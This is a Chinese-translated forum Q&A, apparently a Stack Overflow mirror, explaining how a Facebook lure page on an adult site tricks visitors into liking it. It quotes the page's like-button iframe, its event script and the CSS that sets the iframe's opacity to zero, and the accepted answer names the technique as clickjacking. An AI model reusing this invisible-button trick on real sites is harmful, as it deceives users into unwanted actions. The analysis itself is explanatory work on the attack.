facebook - 这个 FB 恶意软件是如何工作的？

Question

警告：此链接是 NSFW（它是色情内容）。

1truc2dingue.com/3-une-br%C3%A9silienne-enleve-le-bas.html

今天发生了这样的事情，FB上的一位受欢迎的朋友点击了它。我知道这是恶意软件，而他是一名程序员，所以我开始努力弄清楚它是如何愚弄他的。

这是我发现的。在页面的开头，您会发现：

<script type="text/javascript">
<!--
window.fbAsyncInit = function()
{
 FB.init({appId: '135200846551763', status: true, cookie: true, xfbml: true});
 FB.Event.subscribe('edge.create', function(href, widget) {
    document.getElementById("video").style.display= 'block';
    document.getElementById("preview").style.display= 'none';
 });
};
//-->
</script>

那里没有什么太隐秘的。当页面被喜欢（事件愚蠢地称为“edge.create”）时，预览消失，视频（初始化为display:none显示）。

当没有明显的“喜欢！”时，如何为页面点赞？按钮。这是脚本背后的技巧。我可以看到脚本使用了已弃用的 FBML，

<fb:like id=f2 class=iframe href="http://1truc2dingue.com/3-une-brésilienne-enleve-le-bas.html" layout="button_count" show_faces="false" width="480" style="margin-top:65px;margin-left:110px;"></fb:like>

而且，现代 iFrame API，

<iframe id=f1 class=iframe src="http://www.facebook.com/plugins/like.php?href=http://1truc2dingue.com/3-une-brésilienne-enleve-le-bas.html&amp;layout=button_count&amp;show_faces=false&amp;width=450&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:21px;" allowTransparency="true"></iframe>

score 3 · Accepted Answer

这称为ClickJacking

您只需单击不可见的“喜欢”按钮（.iframe类）

.iframe {
    opacity: 0;
    filter: alpha(opacity=0);
}

facebook - 这个 FB 恶意软件是如何工作的？

1 回答 1

Related

Reference